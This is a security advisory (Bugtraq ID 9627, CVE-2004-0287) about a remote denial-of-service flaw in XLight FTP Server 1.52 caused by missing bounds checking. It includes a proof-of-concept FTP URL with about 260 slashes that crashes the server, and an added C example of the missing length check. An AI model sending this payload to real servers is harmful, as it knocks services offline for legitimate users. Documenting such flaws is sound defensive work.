XLight FTP Server Remote Denial Of Service Vulnerability
BID:9627
Info
| Bugtraq ID: | 9627 |
| Class: | Boundary Condition Error |
| CVE: | CVE-2004-0287 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 10 2004 12:00AM |
| Updated: | Jul 12 2009 02:06AM |
| Credit: | Discovery of this issue has been credited to "intuit e.b." <[email protected]>. |
| Vulnerable: | XLight FTP Server 1.52 |
| Not Vulnerable: | |
Discussion
A remote denial of service vulnerability has been reported in the XLight FTP server. A remote attacker may be able to cause the affected server to crash, denying service to legitimate users. The issue is due to insufficient bounds checking.
Exploit / POC
Currently we are not aware of any exploits for this issue. The following proof of concept, which forces the server process to crash, has been provided. Submitting 260 or more bytes to the affected process will cause the server to crash:
-----------------------------------------------------------------------
ftp://[email protected]////////////////////////////////
////////////////////////////////////////////////////
////////////////////////////////////////////////////
////////////////////////////////////////////////////
////////////////////////////////////////////////////
/////////////////////
-----------------------------------------------------------------------
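The kind of bounds check the advisory says is missing, as an added example (not XLight's code and not part of the original advisory): the argument length is validated before it is copied into a fixed buffer, and an oversized argument is refused. The 260-byte buffer size, the use of `CWD`, and the names `copy_ftp_arg` and `try_slashes` are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Assumption: a 260-byte path buffer, chosen to match the advisory's threshold. */
#define PATH_BUF 260

/* Results are named after the FTP reply a server could send back. */
enum { ARG_OK = 0, ARG_MISSING = 500, ARG_TOO_LONG = 501 };

/*
 * Copy the argument of one FTP command line (e.g. "CWD /pub\r\n") into out.
 * The length is checked before any byte is copied, so an oversized argument
 * is refused rather than truncated or written past the end of the buffer.
 */
int copy_ftp_arg(const char *line, char *out, size_t outsz)
{
    const char *sp = strchr(line, ' ');
    if (sp == NULL)
        return ARG_MISSING;
    const char *arg = sp + 1;
    size_t len = strcspn(arg, "\r\n");   /* argument ends at CR or LF */
    if (len == 0)
        return ARG_MISSING;
    if (len >= outsz)                     /* keep one byte for the NUL */
        return ARG_TOO_LONG;
    memcpy(out, arg, len);
    out[len] = '\0';
    return ARG_OK;
}

/* Constructed input: "CWD " plus n slashes, the shape of the advisory's path.
 * CWD is an assumption; the advisory does not name the command involved. */
int try_slashes(size_t n)
{
    char line[1024];
    char path[PATH_BUF];
    if (n > sizeof line - 7)              /* "CWD " + n + "\r\n" + NUL */
        return -1;
    memcpy(line, "CWD ", 4);
    memset(line + 4, '/', n);
    memcpy(line + 4 + n, "\r\n", 3);      /* copies CR, LF and the NUL */
    return copy_ftp_arg(line, path, sizeof path);
}

int main(void)
{
    printf("259 bytes -> %d\n", try_slashes(259));
    printf("260 bytes -> %d\n", try_slashes(260));
    return 0;
}
```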
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
References:
- Product Homepage (XLight FTP Server)
- Remote crash Xlight ftp server 1.52 ("intuit e.b.")